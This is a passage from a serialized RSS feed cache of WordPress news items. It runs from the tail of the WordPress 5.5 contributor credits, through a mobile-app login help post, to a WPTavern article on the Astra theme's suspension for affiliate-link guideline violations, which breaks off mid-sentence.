href=\"https://profiles.wordpress.org/nextendweb/\">Nextendweb</a>, <a href=\"https://profiles.wordpress.org/calvin_ngan/\">Ngan Tengyuen</a>, <a href=\"https://profiles.wordpress.org/nickdaugherty/\">Nick Daugherty</a>, <a href=\"https://profiles.wordpress.org/nickylimjj/\">Nicky Lim</a>, <a href=\"https://profiles.wordpress.org/vadimnicolai/\">nicolad</a>, <a href=\"https://profiles.wordpress.org/rahe/\">Nicolas Juen</a>, <a href=\"https://profiles.wordpress.org/nicolaskulka/\">NicolasKulka</a>, <a href=\"https://profiles.wordpress.org/jainnidhi/\">Nidhi Jain</a>, <a href=\"https://profiles.wordpress.org/nielsdeblaauw/\">Niels de Blaauw</a>, <a href=\"https://profiles.wordpress.org/nielslange/\">Niels Lange</a>, <a href=\"https://profiles.wordpress.org/nigrosimone/\">nigro.simone</a>, <a href=\"https://profiles.wordpress.org/nikhilbhansi/\">Nikhil Bhansi</a>, <a href=\"https://profiles.wordpress.org/nbachiyski/\">Nikolay Bachiyski</a>, <a href=\"https://profiles.wordpress.org/nilovelez/\">Nilo Velez</a>, <a href=\"https://profiles.wordpress.org/niresh12495/\">Niresh</a>, <a href=\"https://profiles.wordpress.org/nmenescardi/\">nmenescardi</a>, <a href=\"https://profiles.wordpress.org/noahtallen/\">Noah Allen</a>, <a href=\"https://profiles.wordpress.org/ntsekouras/\">ntsekouras</a>, <a href=\"https://profiles.wordpress.org/numidwasnotavailable/\">NumidWasNotAvailable</a>, <a href=\"https://profiles.wordpress.org/oakesjosh/\">oakesjosh</a>, <a href=\"https://profiles.wordpress.org/obliviousharmony/\">obliviousharmony</a>, <a href=\"https://profiles.wordpress.org/ockham/\">ockham</a>, <a href=\"https://profiles.wordpress.org/alshakero/\">Omar Alshaker</a>, <a href=\"https://profiles.wordpress.org/onokazu/\">onokazu</a>, <a href=\"https://profiles.wordpress.org/optimizingmatters/\">Optimizing Matters</a>, <a href=\"https://profiles.wordpress.org/ovann86/\">ovann86</a>, <a href=\"https://profiles.wordpress.org/overclokk/\">overclokk</a>, <a href=\"https://profiles.wordpress.org/p_enrique/\">p_enrique</a>, <a href=\"https://profiles.wordpress.org/paaljoachim/\">Paal Joachim Romdahl</a>, <a href=\"https://profiles.wordpress.org/palmiak/\">palmiak</a>, <a href=\"https://profiles.wordpress.org/paresh07/\">Paresh Shinde</a>, <a href=\"https://profiles.wordpress.org/parvand/\">Parvand</a>, <a href=\"https://profiles.wordpress.org/swissspidy/\">Pascal Birchler</a>, <a href=\"https://profiles.wordpress.org/casiepa/\">Pascal Casier</a>, <a href=\"https://profiles.wordpress.org/pbearne/\">Paul Bearne</a>, <a href=\"https://profiles.wordpress.org/pbiron/\">Paul Biron</a>, <a href=\"https://profiles.wordpress.org/pdfernhout/\">Paul Fernhout</a>, <a href=\"https://profiles.wordpress.org/djpaul/\">Paul Gibbs</a>, <a href=\"https://profiles.wordpress.org/figureone/\">Paul Ryan</a>, <a href=\"https://profiles.wordpress.org/paulschreiber/\">Paul Schreiber</a>, <a href=\"https://profiles.wordpress.org/paulstonier/\">Paul Stonier</a>, <a href=\"https://profiles.wordpress.org/pschrottky/\">Paul Von Schrottky</a>, <a href=\"https://profiles.wordpress.org/pavelevap/\">pavelevap</a>, <a href=\"https://profiles.wordpress.org/pedromendonca/\">Pedro Mendon&#231;a</a>, <a href=\"https://profiles.wordpress.org/pentatonicfunk/\">pentatonicfunk</a>, <a href=\"https://profiles.wordpress.org/pputzer/\">pepe</a>, <a href=\"https://profiles.wordpress.org/pessoft/\">Peter \"Pessoft\" Kol&#237;nek</a>, <a href=\"https://profiles.wordpress.org/westi/\">Peter Westwood</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc/\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/pderksen/\">Phil Derksen</a>, <a href=\"https://profiles.wordpress.org/johnstonphilip/\">Phil Johnston</a>, <a href=\"https://profiles.wordpress.org/philipmjackson/\">Philip Jackson</a>, <a href=\"https://profiles.wordpress.org/pierlo/\">Pierre Gordon</a>, <a href=\"https://profiles.wordpress.org/pigdog234/\">pigdog234</a>, <a href=\"https://profiles.wordpress.org/pikamander2/\">pikamander2</a>, <a href=\"https://profiles.wordpress.org/pingram3541/\">pingram</a>, <a href=\"https://profiles.wordpress.org/pionect/\">Pionect</a>, <a href=\"https://profiles.wordpress.org/piyushmca/\">Piyush Patel</a>, <a href=\"https://profiles.wordpress.org/pkarjala/\">pkarjala</a>, <a href=\"https://profiles.wordpress.org/pkvillanueva/\">pkvillanueva</a>, <a href=\"https://profiles.wordpress.org/pmbaldha/\">Prashant Baldha</a>, <a href=\"https://profiles.wordpress.org/pratik028/\">pratik028</a>, <a href=\"https://profiles.wordpress.org/pravinparmar2404/\">Pravin Parmar</a>, <a href=\"https://profiles.wordpress.org/presskopp/\">Presskopp</a>, <a href=\"https://profiles.wordpress.org/presslabs/\">Presslabs</a>, <a href=\"https://profiles.wordpress.org/priyankkpatel/\">Priyank Patel</a>, <a href=\"https://profiles.wordpress.org/priyomukul/\">Priyo Mukul</a>, <a href=\"https://profiles.wordpress.org/prografika/\">ProGrafika</a>, <a href=\"https://profiles.wordpress.org/programmin/\">programmin</a>, <a href=\"https://profiles.wordpress.org/puneetsahalot/\">Puneet Sahalot</a>, <a href=\"https://profiles.wordpress.org/pvogel2/\">pvogel2</a>, <a href=\"https://profiles.wordpress.org/r-a-y/\">r-a-y</a>, <a href=\"https://profiles.wordpress.org/raajtram/\">Raaj Trambadia</a>, <a href=\"https://profiles.wordpress.org/larrach/\">Rachel Peter</a>, <a href=\"https://profiles.wordpress.org/raineorshine/\">raine</a>, <a href=\"https://profiles.wordpress.org/superpoincare/\">Ramanan</a>, <a href=\"https://profiles.wordpress.org/ramiy/\">Rami Yushuvaev</a>, <a href=\"https://profiles.wordpress.org/rastaban/\">Rastaban</a>, <a href=\"https://profiles.wordpress.org/ravanh/\">RavanH</a>, <a href=\"https://profiles.wordpress.org/ravatparmar/\">Ravat Parmar</a>, <a href=\"https://profiles.wordpress.org/ravenswd/\">ravenswd</a>, <a href=\"https://profiles.wordpress.org/rawrly/\">rawrly</a>, <a href=\"https://profiles.wordpress.org/rebasaurus/\">rebasaurus</a>, <a href=\"https://profiles.wordpress.org/redsand/\">Red Sand Media Group</a>, <a href=\"https://profiles.wordpress.org/tabrisrp/\">Remy Perona</a>, <a href=\"https://profiles.wordpress.org/remzicavdar/\">Remzi Cavdar</a>, <a href=\"https://profiles.wordpress.org/renathoc/\">Renatho</a>, <a href=\"https://profiles.wordpress.org/renggo888/\">renggo888</a>, <a href=\"https://profiles.wordpress.org/retlehs/\">retlehs</a>, <a href=\"https://profiles.wordpress.org/retrofox/\">retrofox</a>, <a href=\"https://profiles.wordpress.org/youknowriad/\">Riad Benguella</a>, <a href=\"https://profiles.wordpress.org/rianrietveld/\">Rian Rietveld</a>, <a href=\"https://profiles.wordpress.org/riasat/\">riasat</a>, <a href=\"https://profiles.wordpress.org/richtabor/\">Rich Tabor</a>, <a href=\"https://profiles.wordpress.org/ringisha/\">Ringisha</a>, <a href=\"https://profiles.wordpress.org/ritterml/\">ritterml</a>, <a href=\"https://profiles.wordpress.org/rnaby/\">Rnaby</a>, <a href=\"https://profiles.wordpress.org/rcutmore/\">Rob Cutmore</a>, <a href=\"https://profiles.wordpress.org/dhrrob/\">Rob Migchels</a>, <a href=\"https://profiles.wordpress.org/rob006/\">rob006</a>, <a href=\"https://profiles.wordpress.org/noisysocks/\">Robert Anderson</a>, <a href=\"https://profiles.wordpress.org/miqrogroove/\">Robert Chapin</a>, <a href=\"https://profiles.wordpress.org/robertpeake/\">Robert Peake</a>, <a href=\"https://profiles.wordpress.org/ronalfy/\">Ronald Huereca</a>, <a href=\"https://profiles.wordpress.org/costasovo/\">Rostislav Woln&#253;</a>, <a href=\"https://profiles.wordpress.org/roytanck/\">Roy Tanck</a>, <a href=\"https://profiles.wordpress.org/ruxandra/\">ruxandra</a>, <a href=\"https://profiles.wordpress.org/ryan/\">Ryan Boren</a>, <a href=\"https://profiles.wordpress.org/bookdude13/\">Ryan Fredlund</a>, <a href=\"https://profiles.wordpress.org/ryankienstra/\">Ryan Kienstra</a>, <a href=\"https://profiles.wordpress.org/rmccue/\">Ryan McCue</a>, <a href=\"https://profiles.wordpress.org/welcher/\">Ryan Welcher</a>, <a href=\"https://profiles.wordpress.org/ryotasakamoto/\">Ryota Sakamoto</a>, <a href=\"https://profiles.wordpress.org/ryotsun/\">ryotsun</a>, <a href=\"https://profiles.wordpress.org/soean/\">S&#246;ren Wrede</a>, <a href=\"https://profiles.wordpress.org/sorenbronsted/\">S&#248;ren Br&#248;nsted</a>, <a href=\"https://profiles.wordpress.org/sachittandukar/\">Sachit Tandukar</a>, <a href=\"https://profiles.wordpress.org/sagarjadhav/\">Sagar Jadhav</a>, <a href=\"https://profiles.wordpress.org/sajjad67/\">Sajjad Hossain Sagor</a>, <a href=\"https://profiles.wordpress.org/salcode/\">Sal Ferrarello</a>, <a href=\"https://profiles.wordpress.org/salvatoreformisano/\">Salvatore Formisano</a>, <a href=\"https://profiles.wordpress.org/samful/\">Sam Fullalove</a>, <a href=\"https://profiles.wordpress.org/sswebster/\">Sam Webster</a>, <a href=\"https://profiles.wordpress.org/solarissmoke/\">Samir Shah</a>, <a href=\"https://profiles.wordpress.org/otto42/\">Samuel Wood (Otto)</a>, <a href=\"https://profiles.wordpress.org/samueljseay/\">samueljseay</a>, <a href=\"https://profiles.wordpress.org/pacifika/\">Sander van Dragt</a>, <a href=\"https://profiles.wordpress.org/progremzion/\">Sanket Mehta</a>, <a href=\"https://profiles.wordpress.org/sarahricker/\">sarahricker</a>, <a href=\"https://profiles.wordpress.org/sathyapulse/\">Sathiyamoorthy V</a>, <a href=\"https://profiles.wordpress.org/sayedwp/\">Sayed Taqui</a>, <a href=\"https://profiles.wordpress.org/scarolan/\">scarolan</a>, <a href=\"https://profiles.wordpress.org/scholdstrom/\">scholdstrom</a>, <a href=\"https://profiles.wordpress.org/sc0ttkclark/\">Scott Kingsley Clark</a>, <a href=\"https://profiles.wordpress.org/coffee2code/\">Scott Reilly</a>, <a href=\"https://profiles.wordpress.org/scottsmith/\">Scott Smith</a>, <a href=\"https://profiles.wordpress.org/wonderboymusic/\">Scott Taylor</a>, <a href=\"https://profiles.wordpress.org/scribu/\">scribu</a>, <a href=\"https://profiles.wordpress.org/scruffian/\">scruffian</a>, <a href=\"https://profiles.wordpress.org/seanchayes/\">Sean Hayes</a>, <a href=\"https://profiles.wordpress.org/seanpaulrasmussen/\">seanpaulrasmussen</a>, <a href=\"https://profiles.wordpress.org/seayou/\">seayou</a>, <a href=\"https://profiles.wordpress.org/senatorman/\">senatorman</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov/\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/vjik/\">Sergey Predvoditelev</a>, <a href=\"https://profiles.wordpress.org/sgr33n/\">Sergio de Falco</a>, <a href=\"https://profiles.wordpress.org/sergiomdgomes/\">sergiomdgomes</a>, <a href=\"https://profiles.wordpress.org/functionalrhyme/\">Shannon Smith</a>, <a href=\"https://profiles.wordpress.org/wpshades/\">Shantanu Desai</a>, <a href=\"https://profiles.wordpress.org/shaunandrews/\">shaunandrews</a>, <a href=\"https://profiles.wordpress.org/shooper/\">Shawn Hooper</a>, <a href=\"https://profiles.wordpress.org/shawnz/\">shawnz</a>, <a href=\"https://profiles.wordpress.org/shital-patel/\">Shital Marakana</a>, <a href=\"https://profiles.wordpress.org/shulard/\">shulard</a>, <a href=\"https://profiles.wordpress.org/siliconforks/\">siliconforks</a>, <a href=\"https://profiles.wordpress.org/simonwheatley/\">Simon Wheatley</a>, <a href=\"https://profiles.wordpress.org/simonjanin/\">simonjanin</a>, <a href=\"https://profiles.wordpress.org/sinatrateam/\">sinatrateam</a>, <a href=\"https://profiles.wordpress.org/sjmur/\">sjmur</a>, <a href=\"https://profiles.wordpress.org/skarabeq/\">skarabeq</a>, <a href=\"https://profiles.wordpress.org/skorasaurus/\">skorasaurus</a>, <a href=\"https://profiles.wordpress.org/skoskie/\">skoskie</a>, <a href=\"https://profiles.wordpress.org/slushman/\">slushman</a>, <a href=\"https://profiles.wordpress.org/snapfractalpop/\">snapfractalpop</a>, <a href=\"https://profiles.wordpress.org/seth17/\">SpearsMarketing</a>, <a href=\"https://profiles.wordpress.org/sphakka/\">sphakka</a>, <a href=\"https://profiles.wordpress.org/squarecandy/\">squarecandy</a>, <a href=\"https://profiles.wordpress.org/sreedoap/\">sreedoap</a>, <a href=\"https://profiles.wordpress.org/sstoqnov/\">Stanimir Stoyanov</a>, <a href=\"https://profiles.wordpress.org/ryokuhi/\">Stefano Minoia</a>, <a href=\"https://profiles.wordpress.org/hypest/\">Stefanos Togoulidis</a>, <a href=\"https://profiles.wordpress.org/sswells/\">Steph Wells</a>, <a href=\"https://profiles.wordpress.org/sabernhardt/\">Stephen Bernhardt</a>, <a href=\"https://profiles.wordpress.org/stephencronin/\">Stephen Cronin</a>, <a href=\"https://profiles.wordpress.org/netweb/\">Stephen Edgar</a>, <a href=\"https://profiles.wordpress.org/dufresnesteven/\">Steve Dufresne</a>, <a href=\"https://profiles.wordpress.org/stevegibson12/\">stevegibson12</a>, <a href=\"https://profiles.wordpress.org/sterndata/\">Steven Stern (sterndata)</a>, <a href=\"https://profiles.wordpress.org/stevenkword/\">Steven Word</a>, <a href=\"https://profiles.wordpress.org/stevenkussmaul/\">stevenkussmaul</a>, <a href=\"https://profiles.wordpress.org/stevenlinx/\">stevenlinx</a>, <a href=\"https://profiles.wordpress.org/stiofansisland/\">Stiofan</a>, <a href=\"https://profiles.wordpress.org/subrataemfluence/\">Subrata Sarkar</a>, <a href=\"https://profiles.wordpress.org/sum1/\">SUM1</a>, <a href=\"https://profiles.wordpress.org/quadthemes/\">Sunny</a>, <a href=\"https://profiles.wordpress.org/sunnyratilal/\">Sunny Ratilal</a>, <a href=\"https://profiles.wordpress.org/sushyant/\">Sushyant Zavarzadeh</a>, <a href=\"https://profiles.wordpress.org/suzylah/\">suzylah</a>, <a href=\"https://profiles.wordpress.org/cybr/\">Sybre Waaijer</a>, <a href=\"https://profiles.wordpress.org/synchro/\">Synchro</a>, <a href=\"https://profiles.wordpress.org/sergioestevao/\">Sérgio Estêvão</a>, <a href=\"https://profiles.wordpress.org/miyauchi/\">Takayuki Miyauchi</a>, <a href=\"https://profiles.wordpress.org/karmatosed/\">Tammie Lister</a>, <a href=\"https://profiles.wordpress.org/tangrufus/\">Tang Rufus</a>, <a href=\"https://profiles.wordpress.org/utz119/\">TeBenachi</a>, <a href=\"https://profiles.wordpress.org/tessawatkinsllc/\">Tessa Watkins LLC</a>, <a href=\"https://profiles.wordpress.org/wildworks/\">Tetsuaki Hamano</a>, <a href=\"https://profiles.wordpress.org/themiked/\">theMikeD</a>, <a href=\"https://profiles.wordpress.org/theolg/\">theolg</a>, <a href=\"https://profiles.wordpress.org/tweetythierry/\">Thierry Muller</a>, <a href=\"https://profiles.wordpress.org/thimalw/\">thimalw</a>, <a href=\"https://profiles.wordpress.org/webzunft/\">Thomas M</a>, <a href=\"https://profiles.wordpress.org/tfrommen/\">Thorsten Frommen</a>, <a href=\"https://profiles.wordpress.org/thrijith/\">Thrijith Thankachan</a>, <a href=\"https://profiles.wordpress.org/tiagohillebrandt/\">Tiago Hillebrandt</a>, <a href=\"https://profiles.wordpress.org/tillkruess/\">Till Kr&#252;ss</a>, <a href=\"https://profiles.wordpress.org/timothyblynjacobs/\">Timothy Jacobs</a>, <a href=\"https://profiles.wordpress.org/tkama/\">Tkama</a>, <a href=\"https://profiles.wordpress.org/tmdesigned/\">tmdesigned</a>, <a href=\"https://profiles.wordpress.org/tmoore41/\">tmoore41</a>, <a href=\"https://profiles.wordpress.org/tobiasbg/\">TobiasBg</a>, <a href=\"https://profiles.wordpress.org/tobifjellner/\">tobifjellner (Tor-Bjorn Fjellner)</a>, <a href=\"https://profiles.wordpress.org/tofandel/\">Tofandel</a>, <a href=\"https://profiles.wordpress.org/tomdude/\">tomdude</a>, <a href=\"https://profiles.wordpress.org/tferry/\">Tommy Ferry</a>, <a href=\"https://profiles.wordpress.org/starbuck/\">Tony G</a>, <a href=\"https://profiles.wordpress.org/toro_unit/\">Toro_Unit (Hiroshi Urabe)</a>, <a href=\"https://profiles.wordpress.org/torres126/\">torres126</a>, <a href=\"https://profiles.wordpress.org/zodiac1978/\">Torsten Landsiedel</a>, <a href=\"https://profiles.wordpress.org/toru/\">Toru Miki</a>, <a href=\"https://profiles.wordpress.org/travisnorthcutt/\">Travis Northcutt</a>, <a href=\"https://profiles.wordpress.org/treecutter/\">treecutter</a>, <a href=\"https://profiles.wordpress.org/truongwp/\">truongwp</a>, <a href=\"https://profiles.wordpress.org/tsimmons/\">tsimmons</a>, <a href=\"https://profiles.wordpress.org/dinhtungdu/\">Tung Du</a>, <a href=\"https://profiles.wordpress.org/desaiuditd/\">Udit Desai</a>, <a href=\"https://profiles.wordpress.org/grapplerulrich/\">Ulrich</a>, <a href=\"https://profiles.wordpress.org/vabrashev/\">vabrashev</a>, <a href=\"https://profiles.wordpress.org/vagios/\">Vagios Vlachos</a>, <a href=\"https://profiles.wordpress.org/valchovski/\">valchovski</a>, <a href=\"https://profiles.wordpress.org/valentinbora/\">Valentin Bora</a>, <a href=\"https://profiles.wordpress.org/vayu/\">Vayu Robins</a>, <a href=\"https://profiles.wordpress.org/veromary/\">veromary</a>, <a href=\"https://profiles.wordpress.org/szepeviktor/\">Viktor Sz&#233;pe</a>, <a href=\"https://profiles.wordpress.org/vinkla/\">vinkla</a>, <a href=\"https://profiles.wordpress.org/virginienacci/\">virginienacci</a>, <a href=\"https://profiles.wordpress.org/planvova/\">Vladimir</a>, <a href=\"https://profiles.wordpress.org/vortfu/\">vortfu</a>, <a href=\"https://profiles.wordpress.org/voyager131/\">voyager131</a>, <a href=\"https://profiles.wordpress.org/vtieu/\">vtieu</a>, <a href=\"https://profiles.wordpress.org/webaware/\">webaware</a>, <a href=\"https://profiles.wordpress.org/westonruter/\">Weston Ruter</a>, <a href=\"https://profiles.wordpress.org/whodunitagency/\">Whodunit</a>, <a href=\"https://profiles.wordpress.org/earnjam/\">William Earnhardt</a>, <a href=\"https://profiles.wordpress.org/williampatton/\">williampatton</a>, <a href=\"https://profiles.wordpress.org/planningwrite/\">Winstina</a>, <a href=\"https://profiles.wordpress.org/wpdesk/\">wpdesk</a>, <a href=\"https://profiles.wordpress.org/wpdo5ea/\">WPDO</a>, <a href=\"https://profiles.wordpress.org/alexandreb3/\">WPMarmite</a>, <a href=\"https://profiles.wordpress.org/wppinar/\">wppinar</a>, <a href=\"https://profiles.wordpress.org/yahil/\">Yahil Madakiya</a>, <a href=\"https://profiles.wordpress.org/yashrs/\">yashrs</a>, <a href=\"https://profiles.wordpress.org/yoancutillas/\">yoancutillas</a>, <a href=\"https://profiles.wordpress.org/yohannp/\">yohannp</a>, <a href=\"https://profiles.wordpress.org/yuhin/\">yuhin</a>, <a href=\"https://profiles.wordpress.org/ysalame/\">Yuri Salame</a>, <a href=\"https://profiles.wordpress.org/yvettesonneveld/\">Yvette Sonneveld</a>, <a href=\"https://profiles.wordpress.org/tollmanz/\">Zack Tollman</a>, <a href=\"https://profiles.wordpress.org/zaheerahmad/\">zaheerahmad</a>, <a href=\"https://profiles.wordpress.org/zakkath/\">zakkath</a>, <a href=\"https://profiles.wordpress.org/zebulan/\">Zebulan Stanphill</a>, <a href=\"https://profiles.wordpress.org/zieladam/\">zieladam</a>, and <a href=\"https://profiles.wordpress.org/chesio/\">Česlav Przywara</a>.\n\n\n\n<p>&nbsp;</p>\n\n\n\n<p>Many thanks to all of the community volunteers who contribute in the&nbsp;<a href=\"https://wordpress.org/support/\">support forums</a>. They answer questions from people across the world, whether they are using WordPress for the first time or since the first release. These releases are more successful for their efforts!</p>\n\n\n\n<p>Finally, thanks to all the community translators who worked on WordPress 5.5. Their efforts bring WordPress fully translated to&nbsp;46 languages at release time, with more on the way.</p>\n\n\n\n<p>If you want to learn more about volunteering with WordPress, check out&nbsp;<a href=\"https://make.wordpress.org/\">Make WordPress</a>&nbsp;or the&nbsp;<a href=\"https://make.wordpress.org/core/\">core development blog</a>.</p>\n</div>\n\n\n\n<div class=\"wp-block-column\"></div>\n</div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 11 Aug 2020 19:03:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WP Mobile Apps: How Do I Connect My WordPress.com or Jetpack Site?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://apps.wordpress.com/?p=4037\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"https://apps.wordpress.com/2020/08/11/how-do-i-connect-my-wordpress-com-or-jetpack-site/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1593:\"<p>To access a site hosted with WordPress.com or connected to WordPress.com through the Jetpack plugin, log in with your WordPress.com credentials. After clicking on the <strong>Login button</strong>, select <strong>Continue with WordPress.com. </strong></p>\n\n\n\n<p>You can also select the others options to <strong>Continue with Google</strong> or <strong>Continue with Apple</strong> if the email address linked to these services matches the email address of your WordPress.com account. </p>\n\n\n\n<p>Next, <em>enter the email address</em> associated with your WordPress.com account and click <strong>next</strong>. From there you can either choose to receive a login link to be sent to your email address or click on the link to &#8220;enter your password instead&#8221; to use your password to log in.  If you select the option to receive a login link, you&#8217;ll be given the option to open Mail where you should have received a new email with a button to click to <strong>&#8216;Log in to the app&#8217;</strong>. This link expires in one hour and when clicked should redirect you to the app where you will see a list of your sites and have the option to either Connect another site or press &#8216;Done&#8217; to start managing your WordPress.com connected sites. </p>\n\n\n\n<p>See the login procedure below:</p>\n\n\n\n<ul><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li></ul>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 11 Aug 2020 08:16:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Rebecca\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:116:\"WPTavern: Astra Theme Suspended and Reinstated, Themes Team Works Toward Delisting Strategy for Guideline Violations\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102960\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:275:\"https://wptavern.com/astra-theme-suspended-and-reinstated-themes-team-works-toward-delisting-strategy-for-guideline-violations?utm_source=rss&utm_medium=rss&utm_campaign=astra-theme-suspended-and-reinstated-themes-team-works-toward-delisting-strategy-for-guideline-violations\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:11208:\"<img />\n\n\n\n<p class=\"has-drop-cap\">The Themes Team <a href=\"https://themes.trac.wordpress.org/ticket/87407#comment:3\">suspended Astra</a> from the official theme directory just a few short weeks after it became the first non-default WordPress theme to <a href=\"https://wptavern.com/astra-becomes-the-only-non-default-wordpress-theme-with-1-million-installs\">surpass one million active installs</a>. The reason: the theme was breaking the directory&rsquo;s ban on affiliate links. The theme has since been reinstated. However, it has been delisted from the popular themes list.</p>\n\n\n\n<p>After the Themes Team handed down an initial five-week suspension, the story continued to unfold through various channels over the weekend and into the start of the new week. Brainstorm Force, the company behind the theme, <a href=\"https://themes.trac.wordpress.org/ticket/87407#comment:4\">argued that it did not violate</a> the affiliate link rule because the theme was simply filtering referral IDs of third-party plugins.  The plugins were technically supplying the links. The company also asked for lenience because this was its first violation.</p>\n\n\n\n<p>Since the initial discussion, the Themes Team has reinstated the theme while bumping it off the <a href=\"https://wordpress.org/themes/\">popular themes list</a>. The goal is to make sure existing users still have access to updates while providing a method for dealing with guidelines violations, a method that does not go to the extreme of outright suspension. The team also added an additional week of punishment after finding a sixth affiliate-related violation missed in the initial review.  Astra will now be delisted for a total of six weeks.</p>\n\n\n\n<p>Astra is not the first suspension of a popular theme over the years. These high-profile suspensions can lead to the loss of thousands of dollars in revenue if the theme&rsquo;s business model relies on traffic from WordPress.org. In 2017, a <a href=\"https://wptavern.com/zerif-lite-suspended-from-wordpress-theme-directory-300k-users-left-without-updates\">five-month suspension</a> of the Zerif Lite theme left its creators with a <a href=\"https://wptavern.com/zerif-lite-returns-to-wordpress-org-after-5-month-suspension-and-63-decline-in-revenue\">decline of 63% in revenue</a>. Zerif Lite&rsquo;s user count was around one-third of Astra&rsquo;s current total.</p>\n\n\n\n<p>While it will take some time to see the results, being delisted will likely cut into Brainstorm Force&rsquo;s revenue. The theme upsells a <em>pro</em> version of their theme. It is a common <em>freemium</em> model that many theme companies employ.</p>\n\n\n\n<p>The WordPress.org theme review guidelines <a href=\"https://make.wordpress.org/themes/handbook/review/required/#selling-credits-and-links\">ban affiliate links</a>. More precisely, the guideline is as follows:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>Themes are not allowed to have affiliate URLs or links.</p></blockquote>\n\n\n\n<p>Technically, Brainstorm Force did not directly output affiliate links via its theme. Instead, the theme injected the company&rsquo;s referral ID into affiliate links for third-party plugins when they were active on a user&rsquo;s site. In and of itself, this type of injection is nothing nefarious. The plugins themselves allow for such filtering of their affiliate links, presumably to entice theme authors to make a few dollars by recommending and integrating with them.</p>\n\n\n\n<p>As for the Astra theme, the question is whether it violated the affiliate guideline. When the rule was written, the Themes Team was most likely thinking about direct links within the theme and not a scenario where a theme was injecting a referral ID or filtering an existing link from a plugin.</p>\n\n\n\n<p>According to the Themes Team, at least two of the affiliate IDs in Astra were for plugins that the theme recommended but did not actually integrate with or support in any way. In at least once instance, the theme automatically updated a database option for the Monster Insights plugin to add an affiliate ID &mdash; automatically updating any database option without user action is generally not allowed.</p>\n\n\n\n<p>Regardless of individual opinions on the Theme Team&rsquo;s complete ban of affiliate links, it is not a cut-and-dry situation of simply allowing or disallowing.</p>\n\n\n\n<p>&ldquo;It is also about needing to understand the legal impact of disclosures,&rdquo; said Carolina Nymark, a team representative. &ldquo;It is not something that the team can take responsibility for, nor look away if authors do not follow it.&rdquo;</p>\n\n\n\n<h2>Astra&rsquo;s Apology and Response</h2>\n\n\n\n<img />\n\n\n\n<p class=\"has-drop-cap\">Sujay Pawar, a co-founder of Brainstorm Force, published an <a href=\"https://wpastra.com/open-letter/\">open apology on the Astra blog</a>. However, this apology post created its own controversy within the community. The current post was not the first apology. Pawar changed his original post and removed some of the earlier promises he made to the community.</p>\n\n\n\n<p>According to multiple sources within the community and a <a href=\"https://wpastra.com/open-letter/#comment-62065\">comment on the post</a>, he had promised to dedicate 16 hours from one of the company&rsquo;s senior developers to contribute work for the Themes Team. Along with this contribution, he promised 